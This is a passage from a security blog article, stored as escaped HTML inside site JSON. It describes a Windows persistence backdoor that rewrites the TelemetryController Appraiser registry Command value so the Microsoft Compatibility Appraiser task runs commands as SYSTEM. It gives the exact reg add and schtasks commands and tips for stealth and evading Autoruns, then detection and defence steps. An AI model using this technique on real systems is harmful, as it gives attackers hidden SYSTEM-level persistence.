-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:4iNQvAXT40KhDrm9.1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This process corresponds to the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\u003C\u002Fp>\u003Cp>The following conclusions were drawn from actual testing:\u003C\u002Fp>\u003Col>\u003Cli>After a period of time, if the check is still not completed, the CompatTelRunner.exe process will continue running, and it will not be possible to launch the notepad.exe process with System privileges\u003C\u002Fli>\u003Cli>After a period of time, if the check is completed, the CompatTelRunner.exe process will automatically exit, and then the CompatTelRunner.exe and notepad.exe processes will be launched with System privileges\u003C\u002Fli>\u003Cli>If you choose to forcibly terminate the CompatTelRunner.exe process, similarly, the CompatTelRunner.exe and notepad.exe processes will then be launched with System privileges\u003C\u002Fli>\u003C\u002Fol>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016739170_5_f571120315-1.jpeg\">\u003C\u002Fp>\u003Cp>Here we can avoid this issue and achieve stable triggering to launch the CompatTelRunner.exe and notepad.exe processes with System privileges. The method is as follows:\u003C\u002Fp>\u003Cp>Modify the Command entry in the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\u003C\u002Fp>\u003Cp>The default value is %windir%\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun\u003C\u002Fp>\u003Cp>Here you can choose to skip the check process, for example, by setting the value of the Command entry to empty, which will prevent the check from executing when the scheduled task starts\u003C\u002Fp>\u003Cp>To improve stealth, the Command entry can be set to %windir%\\system32\\CompatTelRunner.exe -m:appraiser.dll\u003C\u002Fp>\u003Cp>To verify whether modifying the key value affects the normal functionality of the system, you can decompile %windir%\\system32\\CompatTelRunner.exe\u003C\u002Fp>\u003Cp>The pseudocode details for launching the process are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016743198_6_8c567293fe-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Prerequisites\u003C\u002Fh3>\u003Cp>Check whether the default scheduled task Microsoft Compatibility Appraiser is enabled. The query command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Fquery \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\" \u002Fv\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Deploying the Backdoor\u003C\u002Fh3>\u003Cp>My test results on Win7, Server2012R2, and Win10 indicate that the stable exploitation method is as follows:\u003C\u002Fp>\u003Cp>Modify the Command entry in the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\u003C\u002Fp>\u003Cp>Set the value to C:\\WINDOWS\\system32\\cmd.exe \u002Fc notepad.exe\u003C\u002Fp>\u003Cp>The command implemented via the command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\" \u002Fv Command \u002Ft REG_EXPAND_SZ \u002Fd \"C:\\WINDOWS\\system32\\cmd.exe \u002Fc notepad.exe\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note: Command to restore the configuration\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\" \u002Fv Command \u002Ft REG_EXPAND_SZ \u002Fd \"%windir%\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Backdoor Trigger\u003C\u002Fh3>\u003Cp>Wait for the scheduled task Microsoft Compatibility Appraiser to run\u003C\u002Fp>\u003Cp>For testing convenience, it can be forced to run with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Frun \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Characteristics\u003C\u002Fh3>\u003Cp>Can bypass Autoruns detection and execute commands with System privileges\u003C\u002Fp>\u003Cp>Can also trigger in a disconnected network state\u003C\u002Fp>\u003Ch2>0x06 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Check if the default value of the registry has been modified\u003C\u002Fh3>\u003Ch4>(1) Check the Command entry in the registry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\" \u002Fv Command\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The default value is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Command    REG_EXPAND_SZ    %windir%\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Check the Keys under the registry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The default values are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\u003Cbr>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\AppraiserServer\u003Cbr>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\AvStatus\u003Cbr>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Census\u003Cbr>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\CensusServer\u003Cbr>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\InvAgent\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Disable the scheduled task Microsoft Compatibility Appraiser\u003C\u002Fh3>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002FChange \u002FDISABLE \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. View information about the process CompatTelRunner.exe\u003C\u002Fh3>\u003Cp>Analyze whether there are suspicious child processes under the process CompatTelRunner.exe\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article documents my learning insights into the TelemetryController backdoor mechanism, summarizes a more general exploitation method, and provides targeted defense recommendations.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",60,"Onedaysec",5,"published","2026-02-02T07:25:19.686Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Backdoor Exploitation via TelemetryController on Windows Systems","TelemetryController backdoor, Windows persistence, CompatTelRunner.exe, Microsoft Compatibility Appraiser, Windows security, registry exploit, scheduled task abuse, Windows 7, Server 2012 R2, defense recommendations",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46,47],1168,1167,1165,1164,{"title":39,"description":39,"image":39},"2026-07-24T15:37:09.160Z","2026-07-23T16:02:37.253Z","draft","2026-07-23T16:17:08.248Z"]